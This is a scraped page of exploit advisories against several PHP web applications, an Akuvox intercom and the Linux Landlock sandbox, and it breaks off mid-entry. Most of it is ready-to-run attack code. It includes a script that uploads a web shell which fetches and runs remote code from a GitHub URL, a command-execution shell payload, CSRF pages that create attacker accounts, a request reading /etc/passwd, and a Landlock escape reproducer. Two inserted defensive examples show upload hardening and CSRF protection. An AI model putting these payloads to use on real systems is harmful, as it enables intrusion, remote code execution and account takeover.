<pre><code>=============================================================================================================================================<br />| # Title : Alphaware E-CommerceSystem 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] This payload injects PHP code of your choice into a SHELL.php file. <br /><br />[+] The web application allows an unauthenticated file upload, which can result in Remote Code Execution.<br /> Combine this issue with an SQL injection to retrieve the randomised name of the uploaded PHP shell.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1<br /><br />[+] payload : <br /><br /><?php<br /><br />function file_upload($target_ip) {<br /> $file_name = "indoushka.php";<br /><br /> $webshell_payload = "<?php<br /> \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';<br /> \$ch = curl_init();<br /> curl_setopt(\$ch, CURLOPT_URL, \$url);<br /> curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);<br /> \$output = curl_exec(\$ch);<br /> curl_close(\$ch);<br /> if (\$output) {<br /> // Safely include the content of the remote PHP file<br /> include 'data://text/plain;base64,' . base64_encode(\$output);<br /> }<br /> ?>";<br /><br /> $post_fields = array(<br /> 'add' => '',<br /> 'product_image' => new CURLFile('data://text/plain;base64,' . 
base64_encode($webshell_payload), 'application/x-php', $file_name),<br /> 'product_name' => 'inouva',<br /> 'product_price' => '123',<br /> 'product_size' => '99',<br /> 'brand' => 'N0_name',<br /> 'category' => 'Hackers',<br /> 'qty' => '1'<br /> );<br /><br /> echo "(+) PHP Code Injection ...\n";<br /><br /> $ch = curl_init();<br /> curl_setopt($ch, CURLOPT_URL, "http://$target_ip/alphaware/admin/admin_football.php");<br /> curl_setopt($ch, CURLOPT_POST, 1);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /><br /> $response = curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "(+) Shell uploaded successfully.\n";<br /> echo "(+) Access the shell at: http://$target_ip/alphaware/photo/$file_name\n";<br />}<br /><br />if ($argc != 2) {<br /> echo "(+) Usage: php " . $argv[0] . " <target ip>\n";<br /> echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";<br /> exit(-1);<br />}<br /><br />$target_ip = $argv[1];<br />file_upload($target_ip);<br /><br /><br />[+] Path : http://127.0.0.1/alphaware/photo/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code><br />Akuvox Smart Intercom/Doorphone Unauthenticated Stream Disclosure<br /><br /><br />Vendor: The Akuvox Company<br />Product web page: https://www.akuvox.com<br />Affected version: Doorphone:<br /> S539<br /> S532<br /> X916<br /> X915<br /> X912<br /> R29<br /> Intercom:<br /> R20K-2<br /> R20A-2<br /> C313W-2<br /> NS-2<br /> NC-2<br /> NX-2<br /> Firmware: 912.30.1.137<br /><br />Summary: Vandal-resistant Door Phone for High-end Buildings. Offering<br />top-of-the-line features, Akuvox X912 is targeted at high-end residential<br />and commercial projects. With a compact size, it is perfect for buildings<br />with limited installation space.<br /><br />Desc: The application suffers from an unauthenticated live stream disclosure<br />when requesting video.cgi endpoint on port 8080.<br /><br />Tested on: lighttpd/1.4.30<br /> EasyHttpServer<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5826<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5826.php<br /><br /><br />25.02.2024<br /><br />--<br /><br /><br />$ firefox http://192.168.1.2:8080/video.cgi<br /></code></pre>
<pre><code>Linux: landlock can be disabled thanks to missing cred_transfer hook; and Smack looks dodgy too<br /><br />I found a logic bug that makes it possible for a process to get rid of all Landlock restrictions applied to it:<br />When a process' cred struct is replaced, this _almost_ always invokes the cred_prepare LSM hook; but in one special case (when KEYCTL_SESSION_TO_PARENT updates the parent's credentials), the cred_transfer LSM hook is used instead. Landlock only implements the cred_prepare hook, not cred_transfer, so KEYCTL_SESSION_TO_PARENT causes all information on Landlock restrictions to be lost.<br /><br />The one piece of good news about this is that it requires access to the keyctl() syscall; and I think Landlock is typically used in combination with some kind of seccomp allowlist, which will probably _usually_ make this issue unreachable from sandboxed code?<br /><br />I had a look at the other LSMs that have cred_prepare or cred_transfer hooks:<br /><br /> - AppArmor handles both hooks in the same way, that's fine<br /> - SELinux handles both hooks in the same way, that's fine<br /> - Tomoyo only handles cred_prepare, not cred_transfer, but it only uses the<br /> hook for something weird that's unrelated to the actual cred structs, so<br /> that's probably fine<br /> - Smack handles both but handles them differently; smack_cred_transfer() only<br /> transfers a subset of the information that smack_cred_prepare() transfers.<br /> That looks a bit dodgy to me but I don't really understand Smack - Casey, can<br /> you check if Smack handles KEYCTL_SESSION_TO_PARENT correctly?<br /><br />I will send a suggested fix for Landlock in a minute.<br /><br /><br />Here's a reproducer for escaping from Landlock confinement, tested on latest<br />mainline (at commit 786c8248dbd33a5a7a07f7c6e55a7bfc68d2ca48):<br /><br />```<br />user@vm:~/landlock-houdini$ cat landlock-houdini.c<br />#define _GNU_SOURCE<br />#include <unistd.h><br />#include <err.h><br 
/>#include <stdint.h><br />#include <stdlib.h><br />#include <fcntl.h><br />#include <stdio.h><br />#include <sys/prctl.h><br />#include <sys/wait.h><br />#include <sys/syscall.h><br />#include <linux/keyctl.h><br /><br />/* stuff from the landlock header */<br />struct landlock_ruleset_attr {<br /> uint64_t handled_access_fs;<br />};<br />#define LANDLOCK_ACCESS_FS_WRITE_FILE (1ULL << 1)<br /><br /><br />#define SYSCHK(x) ({ \<br /> typeof(x) __res = (x); \<br /> if (__res == (typeof(x))-1) \<br /> err(1, "SYSCHK(" #x ")"); \<br /> __res; \<br />})<br /><br />int main(void) {<br /> /* == tell landlock to block opening any files for writing == */<br /> SYSCHK(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0));<br /> struct landlock_ruleset_attr ruleset_attr = {<br /> .handled_access_fs = LANDLOCK_ACCESS_FS_WRITE_FILE<br /> };<br /> int ruleset = SYSCHK(syscall(444/*__NR_landlock_create_ruleset*/, &ruleset_attr, sizeof(ruleset_attr), 0));<br /> SYSCHK(syscall(446/*__NR_landlock_restrict_self*/, ruleset, 0));<br /><br /><br /> /* == make sure we really can't open files for writing == */<br /> int open_res = open("/dev/null", O_WRONLY);<br /> if (open_res != -1)<br /> errx(1, "open for write still worked after sandboxing???");<br /> perror("open for write failed as expected");<br /><br /><br /> /* == try to escape from landlock == */<br /> /* needed for KEYCTL_SESSION_TO_PARENT permission checks */<br /> SYSCHK(syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0, 0, 0));<br /> pid_t child = SYSCHK(fork());<br /> if (child == 0) {<br /> /*<br /> * KEYCTL_SESSION_TO_PARENT is a no-op unless we have a different session<br /> * keyring in the child, so make that happen.<br /> */<br /> SYSCHK(syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0, 0, 0));<br /><br /> /*<br /> * This is where the magic happens:<br /> * KEYCTL_SESSION_TO_PARENT installs credentials on the parent that<br /> * never go through the cred_prepare hook, this path uses cred_transfer<br /> * instead.<br /> * So basically after this call, the parent's landlock restrictions<br /> * are gone.<br /> */<br /> SYSCHK(syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT, 0, 0, 0, 0));<br /> exit(0);<br /> }<br /> int wstatus;<br /> SYSCHK(waitpid(child, &wstatus, 0));<br /> if (!WIFEXITED(wstatus) || WEXITSTATUS(wstatus) != 0)<br /> errx(1, "child failed unexpectedly, unable to test bug");<br /><br /><br /> /* retry the same operation that was previously blocked to see if we escaped */<br /> int open_res2 = open("/dev/null", O_WRONLY);<br /> if (open_res2 != -1)<br /> errx(1, "open for write works again, VULNERABLE!");<br /> perror("open for write failed as it should, seems fixed");<br />}<br />user@vm:~/landlock-houdini$ gcc -o landlock-houdini landlock-houdini.c -Wall<br />user@vm:~/landlock-houdini$ ./landlock-houdini<br />open for write failed as expected: Permission denied<br />landlock-houdini: open for write works again, VULNERABLE!<br />user@vm:~/landlock-houdini$<br />```<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2024-10-22.<br /><br />For more details, see the Project Zero vulnerability disclosure policy:<br />https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html<br /><br />Related CVE Numbers: CVE-2024-42318.<br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Lost and Found Information System v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The following JavaScript code creates a POST request that sends form data to the target server over HTTP. Here are the key points:<br /><br />[+] Create an XMLHttpRequest object:<br /><br /> xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.<br /><br />[+] Open the request:<br /><br /> xhr.open("POST", "http://127.0.0.1/php-lfis/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST".<br /><br />[+] Set the request headers:<br /><br /> xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.<br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.<br /> xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with the given boundary.<br /><br />[+] Enable sending cookies:<br /><br /> xhr.withCredentials = true; Specifies that cookies should be sent with the request, so the victim's existing session cookie is attached.<br /><br />[+] Setting up the request data:<br /><br /> The body is set up using a string containing the form data parts. 
Each part contains information such as username, password, and type.<br /><br /> This string is converted to a Uint8Array and then to a Blob to be sent.<br /><br />[+] Sending the request:<br /><br /> xhr.send(new Blob([aBody])); Sends the data to the server.<br /><br />[+] User Interface:<br /> There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.<br /><br />[+] Go to line 6, set the target site URL, then save the changes. <br /><br />[+] affected file : Users.php.<br /><br />[+] Line 15 : Choose a name "indoushka".<br /><br />[+] Line 19 : Choose a pass "Hacked".<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http:\/\/127.0.0.1\/php-lfis\/classes\/Users.php?f=save", true); <br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "Hacked\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody])); <br /> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> 
<br /> </body> <br /> </html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Loan Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] This HTML page is a user registration form that allows users to input a username and password and upload an avatar image. <br /> The form data is then sent via an AJAX request to a server-side script for processing.<br /><br />[+] Here's a breakdown of how it works:<br /><br /> HTML Structure<br /><br /> Form Elements:<br /> <br /> username: A text field where the user can input their username.<br /> password: A password field for entering a password.<br /> img: A file input for uploading an avatar image (restricted to image file types).<br /><br /> Save User Button:<br /> <br /> An input element with the type button is used to trigger the saveUser() function when clicked.<br /><br />[+] JavaScript (AJAX Request)<br /><br /> <br /> AJAX Request:<br /> <br /> An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).<br /> The request method is POST, and the data is sent to the specified URL.<br /> The onload function checks whether the request was successful (status code 200). If it was, it alerts the user that the save was successful; otherwise, it alerts the user of an error.<br /><br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://127.0.0.1/loan/ajax.php?action=save_user", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code># Exploit Title: Authenticated Code Injection - smfv2.1.4<br /># Date: 8/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 2.1.4<br /># Tested on: Ubuntu 22.04<br /># Blog: https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.html<br /><br />Code Injection Authenticated:<br /><br />Steps to Reproduce:<br /><br />1. Login as admin<br />2. Browse to "Current Theme"<br />3. Click on "Modify Themes" > "SMF Default Theme"<br />4. Click on Admin.template.php<br />5. In the first box enter the PHP payload "<?php system('cat /etc/passwd') ?>"<br /><br /><br />// HTTP POST request showing the code injection payload<br /><br />POST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />[...]<br /><br />entire_file[]=<?php+system('cat /etc/passwd') ?>[...]<br /><br /><br />// HTTP response showing /etc/passwd contents<br /><br />HTTP/1.1 200 OK<br />Server: Apache<br />Pragma: no-cache<br />[...]<br /><br />[...]<br />root:x:0:0:root:/root:/bin/bash<br />bin:x:1:1:bin:/bin:/sbin/nologin<br />daemon:x:2:2:daemon:/sbin:/sbin/nologin<br />adm:x:3:4:adm:/var/adm:/sbin/nologin<br />lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br />[...]<br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : biobook Social Networking Site 1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/janobe/Social%20Networking%20Site%20in%20PHP%20with%20Full%20Source%20Code.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The following HTML code uploads an executable malicious file remotely.<br /><br />[+] Go to line 7.<br /><br />[+] Set the target site URL, then save the changes and apply. <br /><br />[+] save code as poc.html .<br /><br /><div id="right-nav"><br /> <h1>Update Status</h1><br /> <div><br /> <form method="post" action="http://127.0.0.1/social/post.php" enctype="multipart/form-data"><br /> <textarea placeholder="Whats on your mind?" name="content" class="post-text" required=""></textarea><br /> <input type="file" name="image"><br /> <button class="btn-share" name="Submit" value="Log out">Share</button><br /> </form><br /> </div><br /> <br /> </div><br /> <br />[+] http://127.0.0.1/social/upload/<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
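Both the Alphaware advisory and the biobook advisory above rest on the same server-side omission: an upload endpoint that accepts any file, from anyone, and drops it under a web-served directory with the client's file name. The following is an added example, my own code and not code from either advisory or vendor, of the checks such a handler needs. The function names, the `$_SESSION['admin_id']` check, the storage path, and the `product_image` field name are assumptions.

```php
<?php
// Added example: a hardened image-upload handler. Not code from the Alphaware
// or biobook advisories or from either vendor; function names, the
// $_SESSION['admin_id'] check, the storage path and the 'product_image'
// field name are assumptions made for this example.
declare(strict_types=1);

// Store uploads outside the web root so nothing in this directory can be
// requested (and therefore executed) directly. Assumed path.
const UPLOAD_DIR = __DIR__ . '/../storage/photos';
const MAX_BYTES  = 2 * 1024 * 1024;

// Accepted MIME types (detected from the file bytes) and the extension *we* assign.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/** Validate one $_FILES entry and store it under a server-chosen name. */
function save_product_image(array $file): string
{
    // 1. Authentication first: the advisory payloads never log in.
    if (empty($_SESSION['admin_id'])) {
        throw new RuntimeException('authentication required');
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with error ' . ($file['error'] ?? 'none'));
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // 2. The type comes from the bytes, never from the client-supplied name or
    //    Content-Type (the PoC labels its upload application/x-php and names
    //    it *.php; both are ignored here).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!array_key_exists($mime, ALLOWED_TYPES)) {
        throw new RuntimeException('rejected content type ' . $mime);
    }
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a parseable image');
    }

    // 3. Server-chosen random name with a fixed, non-executable extension.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
        throw new RuntimeException('cannot create upload directory');
    }
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('cannot store file');
    }
    chmod($dest, 0640);
    return $name;
}

/** Serve a stored image back; only names of the exact shape we generate are accepted. */
function serve_product_image(string $name): void
{
    if (!preg_match('/^[a-f0-9]{32}\.(jpg|png|gif)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . mime_content_type($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}

if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    session_start();
    try {
        echo json_encode(['stored' => save_product_image($_FILES['product_image'] ?? [])]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['error' => $e->getMessage()]);
    }
}
```

The order of the checks matters: authentication is decided before the file is even inspected, the type is decided from content rather than from anything the client sent, and the name is generated rather than taken from the request, so even a file that passes the image checks can only ever be served back as an image through `serve_product_image()`, never executed.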
<pre><code>=============================================================================================================================================<br />| # Title : Accounting Journal Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/ajms_0_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] This payload injects code of your choice into an HTML page. <br /> <br /> You give it a name, save it in the root directory of the script, and execute it remotely.<br /><br />[+] Line 11 : 'Content[welcome]' = Replace "welcome" with any label you want.<br /><br />[+] Line 11 : Replace the payload as you wish = <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?><br /><br />[+] save payload as poc.html <br /><br />[+] Set your target url<br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title> PHP code injection Tool</title><br /> <script><br /> async function sendRequest() {<br /> const url = document.getElementById('url').value;<br /> const postData = {<br /> 'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`<br /> };<br /><br /> try {<br /> const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {<br /> method: 'POST',<br /> headers: {<br /> 'Content-Type': 'application/x-www-form-urlencoded'<br /> },<br /> body: new 
URLSearchParams(postData).toString()<br /> });<br /><br /> if (response.ok) {<br /> document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';<br /><br /> } else {<br /> document.getElementById('result').innerText = 'Error: ' + response.statusText;<br /> }<br /> } catch (error) {<br /> document.getElementById('result').innerText = 'Error making request: ' + error.message;<br /> }<br /> }<br /> </script><br /></head><br /><body><br /> <h1>Injection Tool</h1><br /> <form onsubmit="event.preventDefault(); sendRequest();"><br /> <label for="url">Enter URL:</label><br /> <input type="text" id="url" name="url" required><br /> <button type="submit">Submit</button><br /> </form><br /> <pre id="result"></pre><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : ABIC cardiology Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://abicegypt.com/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /> <br />[+] Line 7 : Set your target url<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><div class="panel panel-default panel-table"><br /> <div class="panel-heading"> <h2 class="text-center">New User </h2><br /> </div><br /> <div class="panel-body"><br /> <div class="col-md-offset-2 col-md-8"><br /><br /><form action="https://127.0.0.1.com/eg-admin/users/insert.php?" method="post" enctype="multipart/form-data" name="form1" id="form1"><br /><br /> <div class="form-group"> User Name<br /> <input type="text" name="username" class="form-control" placeholder="Insert User Name"><br /> </div><br /> <div class="form-group"> Password<br /> <input type="text" name="password" class="form-control" placeholder="Insert Password"><br /> </div><br /><br /> <div class="col-xs-12"><br /> <button type="submit" class="btn btn-primary btn-xl" name="add"> SAVE </button><br /> </div><br /> <input type="hidden" name="MM_insert" value="form1"><br /></form><br /><br /> </div><br /> </div><br /> </div><br /><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
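The three CSRF advisories above (Lost and Found Information System, Loan Management System and ABIC cardiology Management System) all work the same way: a page on another origin submits a POST with `withCredentials`/a plain form, and the target's "save user" handler accepts it because it checks only the session cookie. The following is an added example, my own code and not from any of those projects, of the server-side checks that break that pattern. The session keys `csrf_token` and `user_id`, the function names, and the availability of `getallheaders()` (Apache and PHP-FPM provide it) are assumptions.

```php
<?php
// Added example: server-side CSRF protection for a "save user" action. My
// code, not from the Lost and Found, Loan Management or ABIC projects.
// Assumptions: the session keys csrf_token and user_id, the function names,
// and that getallheaders() is available (Apache and PHP-FPM provide it).
declare(strict_types=1);

/** Per-session synchronizer token; created once and reused for the session. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to render inside every state-changing form. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * True only if the POST carries the session's token AND the request comes
 * from one of our own origins. A cross-site page cannot read the token
 * (same-origin policy) and browsers always send Origin on a cross-site POST,
 * so the XHR, fetch and plain-form PoCs above fail both checks.
 */
function csrf_check(array $post, array $headers, array $allowedOrigins): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = (string)($post['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $given)) {
        return false;
    }
    $origin = $headers['Origin'] ?? null;
    if ($origin === null && isset($headers['Referer'])) {
        // Older clients may omit Origin; fall back to the Referer's origin.
        $p = parse_url($headers['Referer']);
        if (is_array($p) && isset($p['scheme'], $p['host'])) {
            $origin = $p['scheme'] . '://' . $p['host'] . (isset($p['port']) ? ':' . $p['port'] : '');
        }
    }
    return $origin !== null && in_array($origin, $allowedOrigins, true);
}

/** Handler for e.g. classes/Users.php?f=save; returns status code and body. */
function handle_save_user(array $post, array $headers): array
{
    if (empty($_SESSION['user_id'])) {
        return ['status' => 401, 'body' => 'login required'];
    }
    if (!csrf_check($post, $headers, ['http://127.0.0.1'])) {
        return ['status' => 403, 'body' => 'request rejected: missing or invalid CSRF token/origin'];
    }
    // Only now is it safe to create the account from $post['username'] etc.
    return ['status' => 200, 'body' => 'saved'];
}

if (PHP_SAPI !== 'cli') {
    // SameSite=Lax keeps the browser from attaching the session cookie to a
    // cross-site POST at all, which already defeats xhr.withCredentials = true.
    session_set_cookie_params([
        'samesite' => 'Lax',
        'httponly' => true,
        'secure'   => isset($_SERVER['HTTPS']),
    ]);
    session_start();
    if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
        $r = handle_save_user($_POST, getallheaders());
        http_response_code($r['status']);
        echo $r['body'];
    }
}
```

The token and the origin check are independent layers: the token defends even if a browser lacks `SameSite` support, while the origin check catches a token that leaks through some other bug. Note that none of this helps an endpoint that, like the Alphaware one earlier on this page, requires no login at all; authentication has to come first.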
<pre><code>=============================================================================================================================================<br />| # Title : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Part 01 : about-us.php<br /><br />[+] This payload injects code of your choice into the database via NicEdit, a WYSIWYG editor (V: 0.9 r25) which is called inside the file /hms/admin/about-us.php . <br /> <br />[+] Line 2 : Make sure to include your database connection here<br /><br />[+] Line 44 : Send the form data using fetch API (Set your target url)<br /><br />[+] save payload as poc.php in your localhost path .<br /><br />[+] payload : <br /><br /><?php<br />include('http://127.0.0.1/hospital/hms/admin/include/config.php'); // Make sure to include your database connection here<br /><br />if (isset($_POST['submit'])) {<br /> $pagetitle = $_POST['pagetitle'];<br /> $pagedes = $con->real_escape_string($_POST['pagedes']);<br /> $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");<br /><br /> if ($query) {<br /> echo '<script>alert("About Us has been updated.")</script>';<br /> } else {<br /> echo '<script>alert("Something Went Wrong. 
Please try again.")</script>';<br /> }<br /> exit;<br />}<br />?><br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>indoushka | Update About Us Content</title><br /> <!-- NicEdit Script --><br /> <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script><br /> <script type="text/javascript"><br /> // Apply NicEdit to all text areas when the DOM is loaded<br /> bkLib.onDomLoaded(nicEditors.allTextAreas);<br /><br /> // Function to handle form submission using JavaScript<br /> function submitForm(event) {<br /> event.preventDefault(); // Prevent default form submission<br /><br /> const pagetitle = document.getElementById('pagetitle').value;<br /> const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content<br /><br /> // Prepare the form data to be sent<br /> const formData = new FormData();<br /> formData.append('pagetitle', pagetitle);<br /> formData.append('pagedes', pagedes);<br /> formData.append('submit', true);<br /><br /> // Send the form data using fetch API<br /> fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', 